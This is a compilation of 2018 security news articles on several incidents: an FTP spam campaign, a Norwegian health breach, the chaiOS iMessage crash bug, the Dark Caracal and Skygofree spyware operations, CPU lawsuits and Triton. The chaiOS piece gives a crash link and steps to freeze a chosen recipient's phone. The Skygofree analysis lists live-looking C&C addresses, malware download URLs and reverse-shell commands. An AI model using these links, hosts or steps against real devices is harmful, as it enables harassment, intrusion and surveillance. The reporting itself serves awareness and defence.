“The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable,”

The experts believe the campaign is leveraging the infamous Necurs botnet to send out spam messages, researchers noticed that downloaders used by attackers are similar to those used by the botnet before.

Forcepoint highlighted that the spam volume associated with this campaign was very low compared to other Necurs campaigns, attackers sent only 9,500 emails, it is very low respect millions of emails sent through the botnet in other campaigns.

Another peculiarity of this campaign is the use of FTP servers for download the malware.

“Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to prevent being detected by email gateways and network policies that may consider FTPs as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords,” Forcepoint concluded.

Forcepoint report included IoCs for this campaign.


Health South East RHF data breach exposed health records for half of Norway’s Population
19.1.2018 securityaffairs BigBrothers

On January 8, the Health South East RHF, that is the healthcare organization that manages hospitals in Norway’s southeast region disclosed a major security breach.
On January 8, the Health South East RHF, that is the healthcare organization that manages hospitals in Norway’s southeast region (countries of Østfold, Akershus, Oslo, Hedmark, Oppland, Buskerud, Vestfold, Telemark, Aust-Agder and Vest-Agder), disclosed a security breach that may have exposed sensitive data belonging to more than half of the population.

The incident was announced by the national healthcare security centre HelseCERT that detected an abnormal activity against computer systems in the region. HelseCERT notified the incident to local authorities as well as NorCERT.

“We are in a phase where we try to get an overview. It’s far too early to say how big the attack is. We are working to acquire knowledge of all aspects,” Kjetil Nilsen, director of NorCERT, the National Security Authority (NSM) told Norwegian media outlet VG.

“Everything indicates that it is an advanced player who has the tools and ability to perform such an attack. It can be advanced criminals. There is a wide range of possibilities,”

According to the HelseCert, the security breach is the result of an attack conducted by ‘advanced’ and ‘professional’ hackers.

Authorities announced important measures to limit the damage caused by the security breach.

“A number of measures have been implemented to remove the threat, and further measures will be implemented in the future,” announced Norway’s Ministry of Health and Care in a statement.

“This is a serious situation and measures have been taken to limit the damage caused by the incident,” reads a joint statement published by Health South East RHF and Sykehuspartner HF.

The hospitals in the region currently serve 2.9 million inhabitants, that correspond to 56 percent of the overall population composed of 5.2 million citizens.

norway%20Health%20South%20East%20RHF

Health records are a precious commodity in the cybercrime underground, but are also considered by nation-state actors a mine of data that could be used in further attacks. Experts and government representatives believe that the data breach suffered by the Health South-East RHF could be the result of a cyber espionage campaign conducted by a foreign state interested in gathering data related to people who work in government, military, intelligence personnel, and politicians.

The VG newspaper reported that Health South East hired Hewlett Packard Enterprise in the autumn of 2016 to modernize computer systems in the healthcare company, but the project was suspended because NRK revealed poor control of access to patient data.

The Health South East RHF data breach seems to be not related to the above project, as confirmed by CEO Cathrine Lofthus.

“We have investigated that is important to us. We do not see any connection between this attack and that project, “says Lofthus.


chaiOS Bug can crash iMessage App on any iPhone and macOS with a simple link
19.1.2018 securityaffairs Apple

The software developer Abraham Masri has discovered a new bug, dubbed ‘chaiOS’ that could be exploited to crash a target’s iMessage application.
The researcher and software developer Abraham Masri has discovered a new bug, dubbed ‘chaiOS Text Bomb’ that could be exploited to crash recipient’s iMessage application in a continuous loop.


Abraham Masri
@cheesecakeufo
👋 Effective Power is back, baby!

chaiOS bug:
Text the link below, it will freeze the recipient's device, and possibly restart it. http://iabem97.github.io/chaiOS

⚠️ Do not use it for bad stuff.
----
thanks to @aaronp613 @garnerlogan65 @lepidusdev @brensalsa for testing!

12:00 AM - Jan 17, 2018
133 133 Replies 494 494 Retweets 944 944 likes
Twitter Ads info and privacy
The flaw exploited by the ‘chaiOS Text Bomb’ affects both iOS and macOS, according to researchers at Yalu Jailbreak, the bug is currently compatible up till iOS 11.1.2 firmware, this means that it affects iMessage apps on macOS High Sierra, iOS 10 to 10.3.3, and iOS 11 to 11.2.1.

The exploitation of the issue is very simple, an attacker just needs to send a link to a web page hosting a JavaScript code that attempts to send an SMS message. The iMessage application fails to properly handle the code triggering the crash of the app. In some cases, it has been observed that the iMessage app enters a continuous reboot loop.

A proof-of-concept page has been put together by Masri and shared on Twitter yesterday, but the page has been removed from GitHub due to potential abuses, anyway, a new mirror has been already added.

“chaiOS is a malicious iOS bug that can cause the target device to freeze, respring, drain the battery, and possibly kernel panic. It is developed by the eminent jailbreak developer, Abraham Masri.

Here are the known after-effects once someone opens the malicious link.

The stock Messages app goes completely blank.
Messages app crashes instantly after opening.
Slowdown the target device.
It weighs around 7MB and loads some the exploit into user’s browser window and then crashes it.” states Yalu Jailbreak.

iphone%20chaiOS%20Bug

Below is a video PoC of the exploitation of the bug:

Researchers observed that the chaiOS Text Bomb can also affect Windows systems, it can also crash Chrome and Firefox web browsers.

The download link to the chaiOS is reported on the following page, but please don’t use it.

https://yalujailbreak.net/chaios/

Below instructions to trigger the bug:

Open the Messages app.
Select the recipient whose device you want to crash.
Send them the aforementioned link. Be sure to include a “/” at the end.
You are done with this now. Just wait for them to open the link in Safari.


Researchers Uncover Government-Sponsored Mobile Hacking Group Operating Since 2012
19.1.2018 thehackernews Android

A global mobile espionage campaign collecting a trove of sensitive personal information from victims since at least 2012 has accidentally revealed itself—thanks to an exposed server on the open internet.
It's one of the first known examples of a successful large-scale hacking operation of mobile phones rather than computers.
The advanced persistent threat (APT) group, dubbed Dark Caracal, has claimed to have stolen hundreds of gigabytes of data, including personally identifiable information and intellectual property, from thousands of victims in more than 21 different countries, according to a new report from the Electronic Frontier Foundation (EFF) and security firm Lookout.
After mistakenly leaking some of its files to the internet, the shadowy hacking group is traced back to a building owned by the Lebanese General Directorate of General Security (GDGS), one of the country's intelligence agencies, in Beirut.
"Based on the available evidence, it's likely that the GDGS is associated with or directly supporting the actors behind Dark Caracal," the report reads.
According to the 51-page-long report [PDF], the APT group targeted "entities that a nation-state might attack," including governments, military personnel, utilities, financial institutions, manufacturing companies, defence contractors, medical practitioners, education professionals, academics, and civilians from numerous other fields.

Researchers also identified at least four different personas associated with Dark Caracal's infrastructure — i.e. Nancy Razzouk, Hassan Ward, Hadi Mazeh, and Rami Jabbour — with the help of email address op13@mail[.]com.
"The contact details for Nancy present in WHOIS information matched the public listing for a Beirut-based individual by that name. When we looked at the phone number associated with Nancy in the WHOIS information, we discovered the same number listed in exfiltrated content and being used by an individual with the name Hassan Ward."

"During July 2017, Dark Caracal’s internet service provider took the adobeair[.]net command and control server offline. Within a matter of days, we observed it being re-registered to the email address op13@mail[.]com with the name Nancy Razzouk. This allowed us to identify several other domains listed under the same WHOIS email address information, running similar server components. "
Multi-Platform Cyber Espionage Campaign

Dark Caracal has been conducting multi-platform cyber-espionage campaigns and linked to 90 indicators of compromise (IOCs), including 11 Android malware IOCs, 26 desktop malware IOCs across Windows, Mac, and Linux, and 60 domain/IP based IOCs.
However, since at least 2012, the group has run more than ten hacking campaigns aimed mainly at Android users in at least 21 countries, including North America, Europe, the Middle East and Asia.
The data stolen by Dark Caracal on its targets include documents, call records, text messages, audio recordings, secure messaging client content, browsing history, contact information, photos, and location data—basically every information that allows the APT group to identify the person and have an intimate look at his/her life.
To get its job done, Dark Caracal did not rely on any "zero-day exploits," nor did it has to get the malware to the Google Play Store. Instead, the group used basic social engineering via posts on Facebook groups and WhatsApp messages, encouraging users to visit a website controlled by the hackers and application permissions.
"One of the interesting things about this ongoing attack is that it doesn’t require a sophisticated or expensive exploit. Instead, all Dark Caracal needed was application permissions that users themselves granted when they downloaded the apps, not realizing that they contained malware," said EFF Staff Technologist Cooper Quintin.
"This research shows it’s not difficult to create a strategy allowing people and governments to spy on targets around the world."
Here's How Dark Caracal Group Infects Android Users

Once tricked into landing on the malicious websites, the victims were served fake updates to secure messenger apps, including WhatsApp, Signal, Threema Telegram, and Orbot (an open source Tor client for Android), which eventually downloaded the Dark Caracal malware, dubbed Pallas, on targets' mobile devices.
Pallas is a piece of surveillance malware that's capable of taking photographs, stealing data, spying on communications apps, recording video and audio, acquiring location data, and stealing text messages, including two-factor authentication codes, from victims' devices.
"Pallas samples primarily rely on the permissions granted at the installation in order to access sensitive user data. However, there is functionality that allows an attacker to instruct an infected device to download and install additional applications or updates." report says.
"Theoretically, this means it’s possible for the operators behind Pallas to push specific exploit modules to compromised devices in order to gain complete access."
Besides its own custom malware, Dark Caracal also used FinFisher—a highly secret surveillance tool that is often marketed to law enforcement and government agencies—and a newly discovered desktop spyware tool, dubbed CrossRAT, which can infect Windows, Linux, and OS X operating systems.
"Citizen Lab previously flagged the General Directorate of General Security in a 2015 report as one of two Lebanese government organizations using the FinFisher spyware5." report says.
According to the researchers, though Dark Caracal targeted macOS and Windows devices in various campaigns, at least six distinct Android campaigns were found linked to one of its servers that were left open for analysis, revealing 48GB was stolen from around 500 Android phones.
Overall, Dark Caracal successfully managed to steal more than 252,000 contacts, 485,000 text messages and 150,000 call records from infected Android devices. Sensitive data such as personal photos, bank passwords and PIN numbers were also stolen.
The best way to protect yourself from such Android-based malware attacks is to always download applications from the official Google Play Store market rather than from any third-party website.


Skygofree: Following in the footsteps of HackingTeam
19.1.2018 Kaspersky Android
Skygofree Appendix — Indicators of Compromise (PDF)
At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.

We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy.

Moreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild.

We named the malware Skygofree, because we found the word in one of the domains*.

Malware Features
Android
According to the observed samples and their signatures, early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since.

Signature of one of the earliest versions

The code and functionality have changed numerous times; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device. We have examined all the detected versions, including the latest one that is signed by a certificate valid from September 14, 2017.

The implant provides the ability to grab a lot of exfiltrated data, like call records, text messages, geolocation, surrounding audio, calendar events, and other memory information stored on the device.

After manual launch, it shows a fake welcome notification to the user:

Dear Customer, we’re updating your configuration and it will be ready as soon as possible.

At the same time, it hides an icon and starts background services to hide further actions from the user.

Service Name Purpose
AndroidAlarmManager Uploading last recorded .amr audio
AndroidSystemService Audio recording
AndroidSystemQueues Location tracking with movement detection
ClearSystems GSM tracking (CID, LAC, PSC)
ClipService Clipboard stealing
AndroidFileManager Uploading all exfiltrated data
AndroidPush XMPP С&C protocol (url.plus:5223)
RegistrationService Registration on C&C via HTTP (url.plus/app/pro/)
Interestingly, a self-protection feature was implemented in almost every service. Since in Android 8.0 (SDK API 26) the system is able to kill idle services, this code raises a fake update notification to prevent it:

Cybercriminals have the ability to control the implant via HTTP, XMPP, binary SMS and FirebaseCloudMessaging (or GoogleCloudMessaging in older versions) protocols. Such a diversity of protocols gives the attackers more flexible control. In the latest implant versions there are 48 different commands. You can find a full list with short descriptions in the Appendix. Here are some of the most notable:

‘geofence’ – this command adds a specified location to the implant’s internal database and when it matches a device’s current location the malware triggers and begins to record surrounding audio.
”social” – this command that starts the ‘AndroidMDMSupport’ service – this allows the files of any other installed application to be grabbed. The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools. The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading.

Several hardcoded applications targeted by the MDM-grabbing command

‘wifi’ – this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled. So, when a device connects to the established network, this process will be in silent and automatic mode. This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle (MitM) attacks.

addWifiConfig method code fragments

‘camera’ – this command records a video/capture a photo using the front-facing camera when someone next unlocks the device.
Some versions of the Skygofree feature the self-protection ability exclusively for Huawei devices. There is a ‘protected apps’ list in this brand’s smartphones, related to a battery-saving concept. Apps not selected as protected apps stop working once the screen is off and await re-activation, so the implant is able to determine that it is running on a Huawei device and add itself to this list. Due to this feature, it is clear that the developers paid special attention to the work of the implant on Huawei devices.

Also, we found a debug version of the implant (70a937b2504b3ad6c623581424c7e53d) that contains interesting constants, including the version of the spyware.

Debug BuildConfig with the version

After a deep analysis of all discovered versions of Skygofree, we made an approximate timeline of the implant’s evolution.

Mobile implant evolution timeline

However, some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection. Below is a list of the payloads used by the Skygofree implant in the second and third stages.

Reverse shell payload
The reverse shell module is an external ELF file compiled by the attackers to run on Android. The choice of a particular payload is determined by the implant’s version, and it can be downloaded from the command and control (C&C) server soon after the implant starts, or after a specific command. In the most recent case, the choice of the payload zip file depends on the device process architecture. For now, we observe only one payload version for following the ARM CPUs: arm64-v8a, armeabi, armeabi-v7a.

Note that in almost all cases, this payload file, contained in zip archives, is named ‘setting’ or ‘setting.o’.

The main purpose of this module is providing reverse shell features on the device by connecting with the C&C server’s socket.

Reverse shell payload

The payload is started by the main module with a specified host and port as a parameter that is hardcoded to ‘54.67.109.199’ and ‘30010’ in some versions:

Alternatively, they could be hardcoded directly into the payload code:

We also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path.

Equipped reverse shell payload with specific string

After an in-depth look, we found that some versions of the reverse shell payload code share similarities with PRISM – a stealth reverse shell backdoor that is available on Github.

Reverse shell payload from update_dev.zip

Exploit payload
At the same time, we found an important payload binary that is trying to exploit several known vulnerabilities and escalate privileges. According to several timestamps, this payload is used by implant versions created since 2016. It can also be downloaded by a specific command. The exploit payload contains following file components:

Component name Description
run_root_shell/arrs_put_user.o/arrs_put_user/poc Exploit ELF
db Sqlite3 tool ELF
device.db Sqlite3 database with supported devices and their constants needed for privilege escalation
‘device.db’ is a database used by the exploit. It contains two tables – ‘supported_devices’ and ‘device_address’. The first table contains 205 devices with some Linux properties; the second contains the specific memory addresses associated with them that are needed for successful exploitation. You can find a full list of targeted models in the Appendix.

Fragment of the database with targeted devices and specific memory addresses

If the infected device is not listed in this database, the exploit tries to discover these addresses programmatically.

After downloading and unpacking, the main module executes the exploit binary file. Once executed, the module attempts to get root privileges on the device by exploiting the following vulnerabilities:

CVE-2013-2094
CVE-2013-2595
CVE-2013-6282
CVE-2014-3153 (futex aka TowelRoot)
CVE-2015-3636

Exploitation process

After an in-depth look, we found that the exploit payload code shares several similarities with the public project android-rooting-tools.

Decompiled exploit function code fragment

run_with_mmap function from the android-rooting-tools project

As can be seen from the comparison, there are similar strings and also a unique comment in Italian, so it looks like the attackers created this exploit payload based on android-rooting-tools project source code.

Busybox payload
Busybox is public software that provides several Linux tools in a single ELF file. In earlier versions, it operated with shell commands like this:

Stealing WhatsApp encryption key with Busybox

Social payload
Actually, this is not a standalone payload file – in all the observed versions its code was compiled with exploit payload in one file (‘poc_perm’, ‘arrs_put_user’, ‘arrs_put_user.o’). This is due to the fact that the implant needs to escalate privileges before performing social payload actions. This payload is also used by the earlier versions of the implant. It has similar functionality to the ‘AndroidMDMSupport’ command from the current versions – stealing data belonging to other installed applications. The payload will execute shell code to steal data from various applications. The example below steals Facebook data:

All the other hardcoded applications targeted by the payload:

Package name Name
jp.naver.line.android LINE: Free Calls & Messages
com.facebook.orca Facebook messenger
com.facebook.katana Facebook
com.whatsapp WhatsApp
com.viber.voip Viber
Parser payload
Upon receiving a specific command, the implant can download a special payload to grab sensitive information from external applications. The case where we observed this involved WhatsApp.

In the examined version, it was downloaded from:

hxxp://url[.]plus/Updates/tt/parser.apk

The payload can be a .dex or .apk file which is a Java-compiled Android executable. After downloading, it will be loaded by the main module via DexClassLoader api:

As mentioned, we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way. The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages:

Note that the implant needs special permission to use the Accessibility Service API, but there is a command that performs a request with a phishing text displayed to the user to obtain such permission.

Windows
We have found multiple components that form an entire spyware system for the Windows platform.

Name MD5 Purpose
msconf.exe 55fb01048b6287eadcbd9a0f86d21adf Main module, reverse shell
network.exe f673bb1d519138ced7659484c0b66c5b Sending exfiltrated data
system.exe d3baa45ed342fbc5a56d974d36d5f73f Surrounding sound recording by mic
update.exe 395f9f87df728134b5e3c1ca4d48e9fa Keylogging
wow.exe 16311b16fd48c1c87c6476a455093e7a Screenshot capturing
skype_sync2.exe 6bcc3559d7405f25ea403317353d905f Skype call recording to MP3
All modules, except skype_sync2.exe, are written in Python and packed to binary files via the Py2exe tool. This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries.

msconf.exe is the main module that provides control of the implant and reverse shell feature. It opens a socket on the victim’s machine and connects with a server-side component of the implant located at 54.67.109.199:6500. Before connecting with the socket, it creates a malware environment in ‘APPDATA/myupd’ and creates a sqlite3 database there – ‘myupd_tmp\\mng.db’:

CREATE TABLE MANAGE(ID INT PRIMARY KEY NOT NULL,Send INT NOT NULL, Keylogg INT NOT NULL,Screenshot INT NOT NULL,Audio INT NOT NULL);
INSERT INTO MANAGE (ID,Send,Keylogg,Screenshot,Audio) VALUES (1, 1, 1, 1, 0 )

Finally, the malware modifies the ‘Software\Microsoft\Windows\CurrentVersion\Run’ registry key to enable autostart of the main module.

The code contains multiple comments in Italian, here is the most noteworthy example:

“Receive commands from the remote server, here you can set the key commands to command the virus”

Here are the available commands:

Name Description
cd Change current directory to specified
quit Close the socket
nggexe Execute received command via Python’s subprocess.Popen() without outputs
ngguploads Upload specified file to the specified URL
nggdownloads Download content from the specified URLs and save to specified file
nggfilesystem Dump file structure of the C: path, save it to the file in json format and zip it
nggstart_screen
nggstop_screen Enable/disable screenshot module. When enabled, it makes a screenshot every 25 seconds
nggstart_key
nggstop_key Enable/disable keylogging module
nggstart_rec
nggstop_rec Enable/disable surrounding sounds recording module
ngg_status Send components status to the C&C socket
*any other* Execute received command via Python’s subprocess.Popen(), output result will be sent to the C&C socket.
All modules set hidden attributes to their files:

Module Paths Exfiltrated data format
msconf.exe %APPDATA%/myupd/gen/ %Y%m%d-%H%M%S_filesystem.zip (file structure dump)
system.exe %APPDATA%/myupd/aud/ %d%m%Y%H%M%S.wav (surrounding sounds)
update.exe %APPDATA%/myupd_tmp/txt/
%APPDATA%/myupd/txt/ %Y%m%d-%H%M%S.txt (keylogging)
wow.exe %APPDATA%/myupd/scr/ %Y%m%d-%H%M%S.jpg (screenshots)
skype_sync2.exe %APPDATA%/myupd_tmp/skype/
%APPDATA%/myupd/skype/ yyyyMMddHHmmss_in.mp3
yyyyMMddHHmmss_out.mp3
(skype calls records)
Moreover, we found one module written in .Net – skype_sync2.exe. The main purpose of this module is to exfiltrate Skype call recordings. Just like the previous modules, it contains multiple strings in Italian.

After launch, it downloads a codec for MP3 encoding directly from the C&C server:

http://54.67.109.199/skype_resource/libmp3lame.dll

The skype_sync2.exe module has a compilation timestamp – Feb 06 2017 and the following PDB string:

\\vmware-host\Shared
Folders\dati\Backup\Projects\REcodin_2\REcodin_2\obj\x86\Release\REcodin_2.pdb

network.exe is a module for submitting all exfiltrated data to the server. In the observed version of the implant it doesn’t have an interface to work with the skype_sync2.exe module.

network.exe submitting to the server code snippet

Code similarities
We found some code similarities between the implant for Windows and other public accessible projects.

https://github.com/El3ct71k/Keylogger/
It appears the developers have copied the functional part of the keylogger module from this project.

update.exe module and Keylogger by ‘El3ct71k’ code comparison

Xenotix Python Keylogger including specified mutex ‘mutex_var_xboz’.

update.exe module and Xenotix Python Keylogger code comparison

‘addStartup’ method from msconf.exe module

‘addStartup’ method from Xenotix Python Keylogger

Distribution
We found several landing pages that spread the Android implants.

Malicious URL Referrer Dates
http://217.194.13.133/tre/internet/Configuratore_3.apk http://217.194.13.133/tre/internet/ 2015-02-04 to
present time
http://217.194.13.133/appPro_AC.apk – 2015-07-01
http://217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html 2015-01-20 to
present time
http://217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone%20Configuratore.apk http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active
http://vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http://vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04
http://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk http://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14
http://windupdate.serveftp.com/wind/LTE/WIND%20Configuratore%20v5_4_2.apk http://windupdate.serveftp.com/wind/LTE/ 2015-03-31
http://119.network/lte/Internet-TIM-4G-LTE.apk http://119.network/lte/download.html 2015-02-04
2015-07-20
http://119.network/lte/Configuratore_TIM.apk 2015-07-08
Many of these domains are outdated, but almost all (except one – appPro_AC.apk) samples located on the 217.194.13.133 server are still accessible. All the observed landing pages mimic the mobile operators’ web pages through their domain name and web page content as well.

Landing web pages that mimic the Vodafone and Three mobile operator sites

NETWORK CONFIGURATION
** AGG. 2.3.2015 ***
Dear Customer, in order to avoid malfunctions to your internet connection, we encourage you to upgrade your configuration. Download the update now and keep on navigating at maximum speed!
DOWNLOAD NOW
Do you doubt how to configure your smartphone?
Follow the simple steps below and enter the Vodafone Fast Network.
Installation Guide
Download
Click on the DOWNLOAD button you will find on this page and download the application on your smartphone.
Set your Smartphone
Go to Settings-> Security for your device and put a check mark on Unknown Sources (some models are called Sources Unknown).
Install
Go to notifications on your device (or directly in the Downloads folder) and click Vodafone Configuration Update to install.
Try high speed
Restart your device and wait for confirmation sms. Your smartphone is now configured.

Further research of the attacker’s infrastructure revealed more related mimicking domains.

Unfortunately, for now we can’t say in what environment these landing pages were used in the wild, but according to all the information at our dsiposal, we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks. For example, this could be when the victim’s device connects to a Wi-Fi access point that is infected or controlled by the attackers.

Artifacts
During the research, we found plenty of traces of the developers and those doing the maintaining.

As already stated in the ‘malware features’ part, there are multiple giveaways in the code. Here are just some of them:
ngglobal – FirebaseCloudMessaging topic name
Issuer: CN = negg – from several certificates
negg.ddns[.]net, negg1.ddns[.]net, negg2.ddns[.]net – C&C servers
NG SuperShell – string from the reverse shell payload
ngg – prefix in commands names of the implant for Windows

Signature with specific issuer

Whois records and IP relationships provide many interesting insights as well. There are a lot of other ‘Negg’ mentions in Whois records and references to it. For example:

Conclusions
The Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform. As a result of the long-term development process, there are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, never-before-seen surveillance features such as recording surrounding audio in specified locations.

Given the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam.

Notes
*Skygofree has no connection to Sky, Sky Go or any other subsidiary of Sky, and does not affect the Sky Go service or app.


AMD, Apple Sued Over CPU Vulnerabilities
19.1.2018 securityweek
Vulnerebility
Apple and Advanced Micro Devices (AMD) are also facing class action lawsuits following the disclosure of critical CPU vulnerabilities that affect billions of devices.

The Meltdown and Spectre attack methods, which rely on vulnerabilities that have been around for roughly two decades, allow malicious applications to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive data. Attacks can be launched against systems using processors from Intel, AMD, ARM, and others.

Intel was hit the hardest – a majority of its processors are affected and they are the most likely to be targeted in attacks – so it came as no surprise when several class action lawsuits were filed against the company. However, lawsuits were also filed recently against AMD and Apple.

In the case of AMD, the lawsuits focus on the fact that, shortly after the existence of Meltdown and Spectre came to light, the company claimed that the risk of attacks against its customers was “near zero” due to the architecture of its processors. The company later admitted that the two vulnerabilities that allow Spectre attacks do affect its CPUs.

Lawsuits announced by law firms Pomerantz and Rosen allege that AMD “made materially false and/or misleading statements and/or failed to disclose that: (1) a fundamental security flaw in Advanced Micro’s processor chips renders them susceptible to hacking; and (2) as a result, Advanced Micro’s public statements were materially false and misleading at all relevant times.”

The value of AMD shares went up after the company claimed that its products were not affected, but fell by $0.12, or nearly 1%, after the company confirmed on January 11 that its CPUs are in fact vulnerable to Spectre attacks.

Anyone who purchased AMD shares between February 21, 2017, when the company filed an annual report with the SEC, and January 11, 2018, can join the lawsuits.

The complaints point to several SEC filings from this period that allegedly led to AMD shares being artificially and falsely inflated. Plaintiffs claim they would not have acquired AMD stock at prices inflated by misleading statements and withholding information about the vulnerabilities. Google informed vendors of the flaws in June and July 2017.

In the case of Apple, whose processors rely on ARM technology, the complaint says “all Apple processors are defective because they were designed by Defendant Apple in a way that allows hackers and malicious programs potential access to highly secure information stored on iDevices.”

Plaintiffs claim Apple had known about the flaws for a long time, but did not take action until recently. The complaint, filed on January 8, said Apple had not provided any mitigations against Spectre attacks, but the tech giant did release software updates on the same day.

The complaint claims plaintiffs would not have purchased Apple devices or they would not have paid the price they paid had they known about the vulnerabilities.


Dark Caracal APT – Lebanese intelligence is spying on targets for years
19.1.2018 securityaffairs APT

A new long-running player emerged in the cyber arena, it is the Dark Caracal APT, a hacking crew associated with to the Lebanese General Directorate of General Security that already conducted many stealth hacking campaigns.
Cyber spies belonging to Lebanese General Directorate of General Security are behind a number of stealth hacking campaigns that in the last six years, aimed to steal text messages, call logs, and files from journalists, military staff, corporations, and other targets in 21 countries worldwide.

New nation-state actors continue to improve offensive cyber capabilities and almost any state-sponsored group is able to conduct widespread multi-platform cyber-espionage campaigns.

This discovery confirms that the barrier to entry in the cyber-warfare arena has continued to
decrease and new players are becoming even more dangerous.

The news was reported in a detailed joint report published by security firm Lookout and digital civil rights group the Electronic Frontier Foundation.

The APT group was tracked as Dark Caracal by the researchers, its campaigns leverage a custom Android malware included in fake versions of secure messaging apps like Signal and WhatsApp.
“Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal2, a persistent and prolific actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen
data includes enterprise intellectual property and personally identifiable information.” states the report.
The attack chain implemented by Dark Caracal relies primarily on social engineering, the hackers used messages sent to the victims via Facebook group and WhatsApp messages. At a high-level, the hackers have designed three different kinds of phishing messages to trick victims into visiting a compromised website, a typical watering hole attack.

%20Dark%20caracal

The malicious app could exfiltrate text messages, including two-factor authentication codes, and other data from the victim’s device. Dark Caracal malware is also able to use devices cameras and the microphone to spy on the victims.

Unfortunately, the APT group also used another powerful surveillance software in its campaign, the malware is the dreaded FinFisher, a spyware that is often marketed to law enforcement and government agencies.

Researchers from Lookout and the EFF discovered a number of test devices that appeared to be located in the Beirut building of the Lebanese General Directorate of General Security, suggesting that Dark Caracal APT is linked to the Government
“Devices for testing and operating the campaign were traced back to a building belonging to the Lebanese General Directorate of General Security (GDGS), one of Lebanon’s intelligence agencies. Based on the available evidence, it is likely that the GDGS is associated with or directly supporting the actors behind Dark Caracal. ” continues the report.

Dark Caracal also has a Windows malware in its arsenal, the malicious code was able to collect screenshots and files from the infected PCs.

Dark%20Caracal

Lookout and the EFF launched their investigation in July 2017, the researchers were able to identify the Command and Control infrastructure and determined that the Dark Caracal hackers were running six unique campaigns. Some of the hacking campaigns had been ongoing for years targeting a large number of targets in many countries, including China, the United States, India, and Russia.

“Since we first gained visibility into attacker infrastructure in July 2017, we have seen millions of requests being made to it from infected devices. This demonstrates that Dark Caracal is likely running upwards of six distinct campaigns in parallel, some of which have been operational since January 2012. Dark Caracal targets a broad range of victims.” states the analysis. “Thus far, we have identified members of the military, government officials, medical practitioners, education professionals, academics, civilians from numerous other fields, and commercial enterprises as targets.”

Further details are provided in the technical report that includes more than 90 indicators of
compromise (IOC).


Triton Malware Exploited Zero-Day in Schneider Electric Devices
19.1.2018 securityweek
Virus
The recently discovered malware known as Triton and Trisis exploited a zero-day vulnerability in Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers in an attack aimed at a critical infrastructure organization.

The malware, designed to target industrial control systems (ICS), was discovered after it caused a shutdown at an organization in the Middle East. Both FireEye and Dragos published detailed reports on the threat.

Triton is designed to target Schneider Electric Triconex SIS devices, which are used to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially dangerous situation. The malware uses the TriStation proprietary protocol to interact with SIS controllers, including read and write programs and functions.

Schneider initially believed that the malware had not leveraged any vulnerabilities in its product, but the company has now informed customers that Triton did in fact exploit a flaw in older versions of the Triconex Tricon system.

The company says the flaw affects only a small number of older versions and a patch will be released in the coming weeks. Schneider is also working on a tool – expected to become available next month – that detects the presence of the malware on a controller and removes it.

Schneider has highlighted, however, that despite the existence of the vulnerability, the Triton malware would not have worked had the targeted organization followed best practices and implemented security procedures.

Specifically, the Triton malware can only compromise a SIS device if it’s set to PROGRAM mode. The vendor recommends against keeping the controller in this mode when it’s not actively configured. Had the targeted critical infrastructure organization applied this recommendation, the malware could not have compromised the device, even with the existence of the vulnerability, which Schneider has described as only one element in a complex attack scenario.

The company noted that its product worked as designed – it shut down systems when it detected a potentially dangerous situation – and no harm was incurred by the customer or their environment.

In its advisory, Schneider also told customers that the malware is capable of scanning and mapping systems.

“The malware has the capability to scan and map the industrial control system to provide reconnaissance and issue commands to Tricon controllers. Once deployed, this type of malware, known as a Remotely Accessible Trojan (RAT), controls a system via a remote network connection as if by physical access,” Schneider said.

